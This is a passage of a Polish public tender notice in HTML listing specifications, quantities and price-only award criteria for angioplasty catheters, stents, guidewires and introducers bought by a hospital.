class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty Zamawiający będzie kierował się następującymi kryteriami oceny ofert:<br/>najniższa cena	– 100 %<br/>Sposób oceny ofert:<br/>kryterium „najniższa cena” (Wpc) jako kryterium wymierne obliczane zostanie wg wzoru: <br/>Wpc=Cn/Cof x Rc<br/>gdzie:<br/>Wpc – Wartość punktowa badanej oferty w kryterium „najniższa cena”<br/>Cn – najniższa oferowana cena brutto spośród ofert, które złożyły oferty<br/>Cof– cena brutto oferty badanej<br/>Rc – ranga kryterium „najniższa cena” (100)<br/>W kryterium „najniższa cena” Wykonawca może otrzymać maksymalnie 100 punktów.<br/>Punktacja przyznawana ofertom będzie liczona z dokładnością do dwóch miejsc po przecinku.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Lp.	Wykaz asortymentu J.m.	Ilość<br/>1	System do aterektomii i trombektomii kompatybilne z konsolą do aterektomii JetStream będącą na wyposażeniu Szpitala <br/>2a	Cewnik do aterektomii 2,4/3,4 <br/>-zestaw, w którego skład wchodzi: cewnik, jednostka sterująca cewnika, wkład do pomp, dren z kolcem, woreczek zbiorczy <br/>-cewnik umożliwiający wykonanie aterektomii i aktywnej trombektomii mechanicznej przy pomocy soli fizjologicznej <br/>-głowica robocza cewnika wyposażona w rozkładane skrzydełka powiększające średnicę roboczą cewnika w razie konieczności<br/>-długość robocza cewnika 120 cm <br/>-cewnik over the wire <br/>-kompatybilny z prowadnikiem 0,014” <br/>-kompatybilny z koszulką 7F <br/>-profil cewnika 2,5mm <br/>-średnica głowicy roboczej: 2,4mm przy złożonych skrzydełkach i 3,4mm przy rozłożonych skrzydełkach <br/>-minimalna średnica naczynia wymagana do przeprowadzenia zabiegu: 3,5mm przy skrzydełkach złożonych i 4,5mm przy skrzydełkach rozłożonych	<br/>2b	Cewnik do aterektomii 2,1/3,0<br/>-zestaw, w którego skład wchodzi: cewnik, jednostka sterująca cewnika, wkład do pomp, dren z kolcem, woreczek zbiorczy <br/>-cewnik umożliwiający wykonanie aterektomii i aktywnej trombektomii mechanicznej przy pomocy soli fizjologicznej <br/>-głowica robocza cewnika wyposażona w rozkładane skrzydełka powiększające średnicę roboczą cewnika w razie konieczności <br/>-długość robocza cewnika 135 cm <br/>-cewnik over the wire <br/>-kompatybilny z prowadnikiem 0,014”<br/>-kompatybilny z koszulką 7F <br/>-profil cewnika 2,5mm <br/>-średnica głowicy roboczej: 2,1mm przy złożonych skrzydełkach i 3,0mm przy rozłożonych skrzydełkach <br/>-minimalna średnica naczynia wymagana do przeprowadzenia zabiegu: 3,0mm przy skrzydełkach złożonych i 4,0mm przy skrzydełkach rozłożonych <br/>2c	Cewnik do aterektomii 1,6<br/>-zestaw, w którego skład wchodzi: cewnik, jednostka sterująca cewnika, wkład do pomp, dren z kolcem, woreczek zbiorczy<br/>-cewnik umożliwiający wykonanie aterektomii i aktywnej trombektomii mechanicznej przy pomocy soli fizjologicznej<br/>-długość robocza cewnika 145 cm <br/>-cewnik over the wire<br/>-kompatybilny z prowadnikiem 0,014”<br/>-kompatybilny z koszulką 7F <br/>-profil cewnika 2,33mm<br/>-średnica głowicy roboczej 1,6mm<br/>-minimalna średnica naczynia wymagana do przeprowadzenia zabiegu 2,5mm <br/>2d	Cewnik do aterektomii 1,85<br/>-zestaw, w którego skład wchodzi: cewnik, jednostka sterująca cewnika, wkład do pomp, dren z kolcem, woreczek zbiorczy <br/>-cewnik umożliwiający wykonanie aterektomii i aktywnej trombektomii mechanicznej przy pomocy soli fizjologicznej <br/>-długość robocza cewnika 145 cm <br/>-cewnik over the wire <br/>-kompatybilny z prowadnikiem 0,014”<br/>-kompatybilny z koszulką 7F <br/>-profil cewnika 2,33mm <br/>-średnica głowicy roboczej 1,85mm <br/>-minimalna średnica naczynia konieczna do przeprowadzenia zabiegu 2,75mm <br/>Poz. 2a-2d - 35 sztuk	<br/>3	Prowadnik do cewników <br/>Prowadnik wysokospecjalistyczny 0.014” i 0.018”. Długości: 130, 190 i 300 cm Końcówka prowadnika: prosta - kształtowalna bądź zagięta ‘’J”. Dystalny odcinek pokryty silikonem, odcinek proksymalny pokryty teflonem<br/>Prowadnik o stopniowanej gradacji stożkowatości końcówki: 5/7/10 cm dla prowadnika 0.014” oraz 2,5/3/7 cm dla prowadnika 0,018”. Dostępna wersja z cieniującymi markerami w odstępach 5 mm na dystalnym końcu	<br/>szt 35 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33111730-7 - Wyroby do angioplastyki</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">33141200-2 - Cewniki</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 1.	Zamawiający przewiduje możliwość zastosowania prawa opcji w przypadku niewyczerpania wartości umowy, o której mowa w § 6 ust. 1, w „okresie podstawowym” określonym w § 11 umowy.<br/>2.	Decyzję co do możliwości skorzystania z prawa opcji Zamawiający uzależnia od swoich bieżących potrzeb oraz wykorzystania wartości umowy określonej w § 6 ust. 1 umowy.<br/>3.	Zastosowanie przez Zamawiającego prawa opcji będzie polegać na powtórzeniu tych samych dostaw jak te, które są świadczone przez Wykonawcę, z którym została zawarta niniejsza umowa w sprawie zamówienia publicznego.<br/>4.	Wszystkie wymagania zawarte w umowie i SWZ dotyczą także realizacji zamówienia w ramach prawa opcji. W przypadku zastosowania prawa opcji żadna cena wskazana w Formularzu Cenowym Wykonawcy, nie ulegnie zmianie za wyjątkiem przypadków i na zasadach opisanych w umowie. <br/>5.	Przy zastosowaniu prawa opcji Wykonawca będzie świadczył dostawy w okresie nie dłuższym niż 6 miesięcy, następujących po dniu, wskazanym w umowie jako dzień zakończenia świadczenia dostawy w „okresie podstawowym”.<br/>6.	Zamawiający może wykonać prawo opcji wielokrotnie i w dowolnym dniu przed upływem „okresu podstawowego” lub w okresie obowiązywania umowy wskutek skorzystania z opcji. Zamawiający złoży Wykonawcy oświadczenie o zastosowaniu prawa opcji. Niezłożenie oświadczenia we wskazanym w zdaniu poprzednim terminie będzie oznaczało, że Zamawiający rezygnuje z zastosowania prawa opcji.<br/>7.	W przypadku zastosowania przez Zamawiającego prawa opcji oświadczenie, o którym mowa w ust. 6 będzie stanowiło integralną część Umowy. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2024-11-02</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty Zamawiający będzie kierował się następującymi kryteriami oceny ofert:<br/>najniższa cena	– 100 %<br/>Sposób oceny ofert:<br/>kryterium „najniższa cena” (Wpc) jako kryterium wymierne obliczane zostanie wg wzoru: <br/>Wpc=Cn/Cof x Rc<br/>gdzie:<br/>Wpc – Wartość punktowa badanej oferty w kryterium „najniższa cena”<br/>Cn – najniższa oferowana cena brutto spośród ofert, które złożyły oferty<br/>Cof– cena brutto oferty badanej<br/>Rc – ranga kryterium „najniższa cena” (100)<br/>W kryterium „najniższa cena” Wykonawca może otrzymać maksymalnie 100 punktów.<br/>Punktacja przyznawana ofertom będzie liczona z dokładnością do dwóch miejsc po przecinku.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Lp.	Wykaz asortymentu J.m.	Ilość<br/>1	Stenty rozprężane na balonie, chromowo - kobaltowe, kompatybilne z prowadnikiem 0,035” do leczenia tętnic bidorowych<br/>Pokrycie pasywne powłoką węglika krzemu - nie aktywuje płytek krwi i fibrynogenu (zmniejsza ryzyko wykrzepiania na powierzchni strutów), ogranicza dyfuzję jonów metali do otaczającej tkanki (redukuje ryzyko korozji i uczulenia na nikiel) oraz przyśpiesza proces endotelializacji i gojenia naczynia<br/>-materiał konstrukcyjny: stop chromu i kobaltu – stent cienkościenny<br/>-długości 18, 28, 38, 58, 78 mm<br/>-średnice 5.0, 6.0, 7.0, 8.0, 9.0, 10.0 mm<br/>-długości systemów dostarczania 90 cm, 130 cm oraz 170 cm (możliwość uzyskania dostępu promieniowego) – Over The Wire<br/>-2 markery na systemie dostarczającym oznaczające pozycję stentu<br/>-kompatybilne z introducerem 6F dla wszystkich średnic<br/>-shaft 5.1 – 5.4 F, pokryty hydrofobowo, dual – lumen<br/>-ciśnienie nominalne 10 atm -RBP 14 atm (dla średnic 5 – 8 mm) i 12 atm (dla średnic 9 – 10 mm)<br/>-grubość strutów stentu 110 µm dla średnic 5 – 7 mm oraz 140 µm dla średnic 8 – 10 mm,<br/>-siła radialna: 0.128 N/mm2<br/>-możliwość doprężenia stentu o średnicy 5 mm do średnicy 7.5 mm<br/>-konstrukcja podwójnej spirali pozwala na właściwą apozycję stentu do ściany naczynia i jej właściwe podtrzymywanie oraz zapobiegająca nakładaniu się i wystawaniu drutów stentu – zapobiega efektowi „rybiej łuski” - przy wysokiej elastyczności – siłą zgięcia 57.4 Nmm2<br/>-skracalność pomijalna	szt	70<br/>2	Introducer zbrojony<br/>-długości: 45 cm (fabrycznie zagięta – cross over i prosta)<br/>-konstrukcja polimerowa ze stalowym zbrojeniem, zapewniającym utrzymanie średnicy wewnętrznej<br/>-średnica 4, 5, 6 F<br/>-kompatybilna z prowadnikiem 0,035”<br/>-fabrycznie taperowana<br/>-zastawka hemostatyczna i trójdrożny kranik<br/>-odkręcany kranik w koszulkach 5 i 6F<br/>-średnica wewnętrzna introducera 4F – 0,064”	szt	50<br/>3	Introducer zbrojony<br/>-90cm (prosty)<br/>-konstrukcja polimerowa ze stalowym zbrojeniem, zapewniającym utrzymanie średnicy wewnętrznej<br/>-średnica 4, 5, 6,7, 8F<br/>-powłoka hydrofobowa na dystalnym odcinku 30 cm. dla średnic 5 – 8F ułatwiająca przechodzenie i stabilizację<br/>-kompatybilna z prowadnikiem 0,035”<br/>-fabrycznie taperowana<br/>-zastawka hemostatyczna i trójdrożny kranik<br/>-odkręcany kranik w koszulkach 5, 6, 7, 8F<br/>-Średnica wewnętrzna introducera 4F – 0,064”	szt	10<br/>4	Introducer zbrojony<br/>-długość: 65 cm. (prosta)<br/>-konstrukcja polimerowa ze stalowym zbrojeniem, zapewniającym utrzymanie średnicy wewnętrznej<br/>-średnica 4, 5, 6,7, 8F<br/>-powłoka hydrofobowa na dystalnym odcinku 30 cm. dla średnic 5 – 8F ułatwiająca przechodzenie i stabilizację<br/>-kompatybilna z prowadnikiem 0,035”<br/>-fabrycznie taperowana<br/>-zastawka hemostatyczna i trójdrożny kranik<br/>-odkręcany kranik w koszulkach 5, 6, 7, 8F<br/>-średnica wewnętrzna introducera 4F – 0,064”	szt	10<br/>5	Cewniki balonowe kompatybilne z prowadnikiem 0,014<br/>-kontrolowana podatność między 4 a 6%<br/>-długości 20, 40, 70, 100, 140, 180, 220 mm<br/>-średnice 1.5, 2.0, 2.5, 3.0, 3.5, 4.0 mm<br/>-długości systemów dostarczania 90 cm (tylko dla średnic 2.5 - 4.0 mm), 150 cm oraz 120 cm (tylko dla średnic 1.5 i 2.0 mm.) – Over The Wire<br/>-2 markery na systemie dostarczającym oznaczające pozycję balonu<br/>-profil przejścia: 0,53 mm. w odległości 0,5 mm. od końcówki i 0,69 mm w odległości 2,5 mm od końcówki<br/>-kompatybilne z introducerem 4F<br/>-shaft proksymalny 3,9F hydrofobowy typu coaxial (współosiowy) – wysoka odporność na załamania, dystalny 3.1F – hydrofilny<br/>-wyposażony w prowadnik usztywniający system dostarczania, zapobiegający załamaniom systemu i poprawiającym jego popychalność<br/>-sposób pokrycia ułatwiający przeprowadzanie przez zmiany i jednocześnie zapobiegający ześlizgiwaniu się balonu podczas rozprężania, pokrycie zwiniętego balonu substancją ułatwiającą manewrowanie i doprowadzenie balonu do celu<br/>-ciśnienie nominalne 7 atm., RBP 14 atm.<br/>-przykładowy profil cewnika po deflacji dla średnicy 1.5 mm wynosi 0,029” średni czas deflacji balonu 3.0 mm wynosi ok 10 sek.	szt	10<br/>6	Cewniki balonowe kompatybilne z prowadnikiem 0,018”<br/>-semi compliant (4 – 8%)<br/>-długości: 20, 40, 60, 80, 120, 150, 170, 200 mm<br/>-średnice: 2.0, 2.5, 3.0, 3.5, 4.0, 5.0, 6.0, 7.0 mm<br/>-długości systemów dostarczania 90 cm, 130 cm oraz 150 cm (tylko dla średnicy 2.0 mm) – Over The Wire <br/>-2 markery na systemie dostarczającym oznaczające pozycję balonu <br/>-kompatybilne z introducerem 4F i 5F (5F: 6 x 120 – 200 mm, oraz 7 x 80 – 200 mm)<br/>-shaft 3.8F – 3.9F, coaxial – wysoka odporność na załamania, hydrofobowy<br/>-sposób pokrycia ułatwiający przeprowadzanie przez zmiany i jednocześnie zapobiegający ześlizgiwaniu się balonu <br/>-ciśnienie nominalne: 6 atm <br/>-RBP pomiędzy 12 a 15 atm. w zależności od średnicy	szt	20<br/>7	Cewniki balonowe kompatybilne z prowadnikiem 0,035”<br/>-semi compliant<br/>-balon wykonany z polimeru półkrystalicznego<br/>-długości: 20, 40, 60, 80, 100, 120, 150, 170, 200 mm<br/>-średnice 3.0, 4.0, 5.0, 6.0, 7.0, 8.0, 9.0, 10 mm<br/>-3 długości systemów dostarczania 80, 90 cm oraz 130 – Over The Wire<br/>-2 markery na systemie dostarczającym oznaczające pozycję balonu<br/>-kompatybilne z introducerem 5F (3 – 7 mm) i 6F (8 – 10 mm)<br/>-shaft 5F, dual - lumen, hydrofobowy; zwinięty balon ma 5 zakładek<br/>-sposób pokrycia ułatwiający przeprowadzanie przez zmiany i jednocześnie zapobiegający ześlizgiwaniu się balonu<br/>-ciśnienie nominalne 7 atm. -RBP 11 – 20 atm.	szt	30<br/>8	Stenty samorozprężalne długie kompatybilne z prowadnikiem 0,018”<br/>-pokrycie pasywne powłoką węglika krzemu - nie aktywuje płytek krwi i fibrynogenu (zmniejsza ryzyko wykrzepiania na powierzchni stratów), ogranicza dyfuzję jonów metali do otaczającej tkanki (redukuje ryzyko korozji i uczulenia na nikiel) oraz przyśpiesza proces endotelializacji i gojenia naczynia<br/>-materiał konstrukcyjny: nitinol<br/>-długości: 30, 40, 60, 80, 100, 120, 150, 170, 200 mm<br/>-średnice 4.0, 5.0, 6.0, 7.0 mm<br/>-długości systemów dostarczania 90 cm. oraz 135 cm. – Over The Wire<br/>-grubość strutów: 140 µm<br/>-szerokość strutów: 85 µm<br/>-skracalność poniżej 2%<br/>-po 6 złotych markerów na każdym z końców stentu<br/>-kompatybilne z introducerem 4F dla wszystkich średnic<br/>-system Tri – axialny umożliwiający precyzyjną implantację, uwalnianie jedną ręką<br/>-połączenia typu „S” – lepsza elastyczność<br/>-12 „koron” w jednym segmencie<br/>-konstrukcja wieloelementowa - każdy z segmentów działa niezależnie<br/>-brak efektu „rybiej łuski” dzięki konstrukcji „peak to valley”	szt	20<br/>9	Stenty nerkowe rozprężane na balonie, kompatybilne z prowadnikiem 0,014”<br/>-pokrycie pasywne powłoką węglika krzemu - nie aktywuje płytek krwi i fibrynogenu (zmniejsza ryzyko wykrzepiania na powierzchni strutów), ogranicza dyfuzję jonów metali do otaczającej tkanki (redukuje ryzyko korozji i uczulenia na nikiel) oraz przyśpiesza proces endotelializacji i gojenia naczynia<br/>-materiał konstrukcyjny: CrCo<br/>-długości 12, 15, 19 mm<br/>-średnice 4.5, 5.0, 6.0, 7.0 mm<br/>-długości systemów dostarczania 80 cm. oraz 140 – Rx<br/>-jeden marker proksymalny na stencie, dwa markery na systemie dostarczania<br/>-kompatybilne z introducerem 4F (4.5 i 5 cm.) i 5F (6 i 7 cm.)<br/>-profil przejścia: 0,053” dla 4.5 – 5.0 mm., 0,067” dla 6.0 – 7.0.mm<br/>-ciśnienie nominalne 10 atm<br/>-RBP 15 atm (dla średnic 4.5 – 6 mm.) i 13 atm (dla średnicy 7 mm.)	szt	4<br/>10	Cewniki balonowe uwalniające lek kompatybilne z prowadnikiem 0,018”<br/>-Semi compliant (4 – 8%)<br/>-długości: 40, 80, 120 mm<br/>-średnice: 3.0, 4.0, 5.0, 6.0, 7.0 mm<br/>-lek: Paclitaxel<br/>-środek ułatwiający transfer leku do ściany naczynia: BTHC (butyryl-tri-hexyl citrate)<br/>-sposób nanoszenia leku: mikropipeting, równomierne nanoszenie leku<br/>-dawka leku: 3 µg/mm²<br/>-długości systemów dostarczania 90 cm., 130 cm. – Over The Wire<br/>-2 markery na systemie dostarczającym oznaczające pozycję balonu<br/>-kompatybilne z introducerem 4F (śr. 3 – 4 mm) i 5F (śr. 5 – 7 mm)<br/>-shaft 3,8F, coaxial – wysoka odporność na załamania, hydrofobowy<br/>-sposób pokrycia ułatwiający przeprowadzanie przez zmiany i jednocześnie zapobiegający ześlizgiwaniu się balonu<br/>-ciśnienie nominalne: 6 atm-RBP pomiędzy 12 a 15 atm. w zależności od średnicy<br/>-wyposażony w urządzenie ułatwiające wprowadzenie bez utraty leku z balonu przy przechodzeniu przez śluzę introducera-późna utrata światła naczynia (LLL) w 6 miesiącu obserwacji 0,51 mm<br/>-brak konieczności ponownych rewaskularyzacji (freedom from TLR) na poziomie 84,6% w 12 miesiącu obserwacji, oraz poprawa drożności w klasyfikacji Rutherforda u 72% badanych – badanie randomizowane BIOLUX P – I<br/>-brak konieczności ponownych rewaskularyzacji (freedom from TLR) na poziomie 84,3% w 6 miesiącu obserwacji, oraz poprawa drożności w klasyfikacji Rutherforda u 59% badanych – badanie randomizowane BIOLUX P – II	szt	5<br/>11	Cewnik wspomagający typu Extra Support (Przeznaczony do wymiany i wspomagania prowadników w naczyniach obwodowych)<br/>-mikrocewnik wysokospecjalistyczny wspomagający dedykowany do zabiegów CTO w obszarze obwodowym przy dostępie antegrade, retrograde i transcollateral<br/>-kompatybilne z prowadnikiem 0,014” i 0,018”<br/>-dostępne długości mikrocewnika: 60,70, 80, 90, 110, 135, 150 cm<br/>-średnica w odcinku proksymalnym 2,6 F<br/>-średnica w odcinku dystalnym 1,6 F i 1,8 F w zależności od rodzaju cewnika<br/>-kształt prosty z platynowym markerem na dystalnym końcu zapewniające dobrą widoczność w skopii<br/>-materiał wykonania : trzon wzmocniony wolframowym oplotem, na zewnątrz poliuretanowy płaszcz z powłoką hydrofilną w części dystalnej<br/>-powłoka hydrofilna, dystalnie na odcinku: 40, 60, 80, 100 i 120 cm w zależności od rodzaju cewnika<br/>-końcówka prosta z markerem platynowym<br/>-zalecany cewnik prowadzący 0,035&#34;	szt	5 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33111730-7 - Wyroby do angioplastyki</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">33141200-2 - Cewniki</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 1.	Zamawiający przewiduje możliwość zastosowania prawa opcji w przypadku niewyczerpania wartości umowy, o której mowa w § 6 ust. 1, w „okresie podstawowym” określonym w § 11 umowy.<br/>2.	Decyzję co do możliwości skorzystania z prawa opcji Zamawiający uzależnia od swoich bieżących potrzeb oraz wykorzystania wartości umowy określonej w § 6 ust. 1 umowy.<br/>3.	Zastosowanie przez Zamawiającego prawa opcji będzie polegać na powtórzeniu tych samych dostaw jak te, które są świadczone przez Wykonawcę, z którym została zawarta niniejsza umowa w sprawie zamówienia publicznego.<br/>4.	Wszystkie wymagania zawarte w umowie i SWZ dotyczą także realizacji zamówienia w ramach prawa opcji. W przypadku zastosowania prawa opcji żadna cena wskazana w Formularzu Cenowym Wykonawcy, nie ulegnie zmianie za wyjątkiem przypadków i na zasadach opisanych w umowie. <br/>5.	Przy zastosowaniu prawa opcji Wykonawca będzie świadczył dostawy w okresie nie dłuższym niż 6 miesięcy, następujących po dniu, wskazanym w umowie jako dzień zakończenia świadczenia dostawy w „okresie podstawowym”.<br/>6.	Zamawiający może wykonać prawo opcji wielokrotnie i w dowolnym dniu przed upływem „okresu podstawowego” lub w okresie obowiązywania umowy wskutek skorzystania z opcji. Zamawiający złoży Wykonawcy oświadczenie o zastosowaniu prawa opcji. Niezłożenie oświadczenia we wskazanym w zdaniu poprzednim terminie będzie oznaczało, że Zamawiający rezygnuje z zastosowania prawa opcji.<br/>7.	W przypadku zastosowania przez Zamawiającego prawa opcji oświadczenie, o którym mowa w ust. 6 będzie stanowiło integralną część Umowy. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2024-11-02</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty Zamawiający będzie kierował się następującymi kryteriami oceny ofert:<br/>najniższa cena	– 100 %<br/>Sposób oceny ofert:<br/>kryterium „najniższa cena” (Wpc) jako kryterium wymierne obliczane zostanie wg wzoru: <br/>Wpc=Cn/Cof x Rc<br/>gdzie:<br/>Wpc – Wartość punktowa badanej oferty w kryterium „najniższa cena”<br/>Cn – najniższa oferowana cena brutto spośród ofert, które złożyły oferty<br/>Cof– cena brutto oferty badanej<br/>Rc – ranga kryterium „najniższa cena” (100)<br/>W kryterium „najniższa cena” Wykonawca może otrzymać maksymalnie 100 punktów.<br/>Punktacja przyznawana ofertom będzie liczona z dokładnością do dwóch miejsc po przecinku.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Lp.	Wykaz asortymentu J.m.	Ilość<br/>	Urządzenie all in one: system do powrotu do światła naczynia, cewnik wspierający, cewnik do udrożnień; <br/>- 2.9F i 4F; <br/>- system 2.9F kompatybilny z prowadnikiem 0,014”, posiadający dwie pozycje robocze igły; <br/>- system 4F kompatybilny z prowadnikiem 0,018”, posiadający trzy pozycje robocze igły; <br/>- obracająca się o 360° igła nitinolowa, sterowalna, dająca możliwość ukierunkowanego ponownego wejścia do naczynia; <br/>- długość systemu 80 i 120 cm	<br/>szt	5 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33111730-7 - Wyroby do angioplastyki</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 1.	Zamawiający przewiduje możliwość zastosowania prawa opcji w przypadku niewyczerpania wartości umowy, o której mowa w § 6 ust. 1, w „okresie podstawowym” określonym w § 11 umowy.<br/>2.	Decyzję co do możliwości skorzystania z prawa opcji Zamawiający uzależnia od swoich bieżących potrzeb oraz wykorzystania wartości umowy określonej w § 6 ust. 1 umowy.<br/>3.	Zastosowanie przez Zamawiającego prawa opcji będzie polegać na powtórzeniu tych samych dostaw jak te, które są świadczone przez Wykonawcę, z którym została zawarta niniejsza umowa w sprawie zamówienia publicznego.<br/>4.	Wszystkie wymagania zawarte w umowie i SWZ dotyczą także realizacji zamówienia w ramach prawa opcji. W przypadku zastosowania prawa opcji żadna cena wskazana w Formularzu Cenowym Wykonawcy, nie ulegnie zmianie za wyjątkiem przypadków i na zasadach opisanych w umowie. <br/>5.	Przy zastosowaniu prawa opcji Wykonawca będzie świadczył dostawy w okresie nie dłuższym niż 6 miesięcy, następujących po dniu, wskazanym w umowie jako dzień zakończenia świadczenia dostawy w „okresie podstawowym”.<br/>6.	Zamawiający może wykonać prawo opcji wielokrotnie i w dowolnym dniu przed upływem „okresu podstawowego” lub w okresie obowiązywania umowy wskutek skorzystania z opcji. Zamawiający złoży Wykonawcy oświadczenie o zastosowaniu prawa opcji. Niezłożenie oświadczenia we wskazanym w zdaniu poprzednim terminie będzie oznaczało, że Zamawiający rezygnuje z zastosowania prawa opcji.<br/>7.	W przypadku zastosowania przez Zamawiającego prawa opcji oświadczenie, o którym mowa w ust. 6 będzie stanowiło integralną część Umowy. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2024-11-02</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty Zamawiający będzie kierował się następującymi kryteriami oceny ofert:<br/>najniższa cena	– 100 %<br/>Sposób oceny ofert:<br/>kryterium „najniższa cena” (Wpc) jako kryterium wymierne obliczane zostanie wg wzoru: <br/>Wpc=Cn/Cof x Rc<br/>gdzie:<br/>Wpc – Wartość punktowa badanej oferty w kryterium „najniższa cena”<br/>Cn – najniższa oferowana cena brutto spośród ofert, które złożyły oferty<br/>Cof– cena brutto oferty badanej<br/>Rc – ranga kryterium „najniższa cena” (100)<br/>W kryterium „najniższa cena” Wykonawca może otrzymać maksymalnie 100 punktów.<br/>Punktacja przyznawana ofertom będzie liczona z dokładnością do dwóch miejsc po przecinku.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> 1.	Wykonawca w celu potwierdzenia, że oferowane dostawy spełniają określone przez Zamawiającego wymagania, złoży wraz z ofertą, aktualne na dzień złożenia przedmiotowe środki 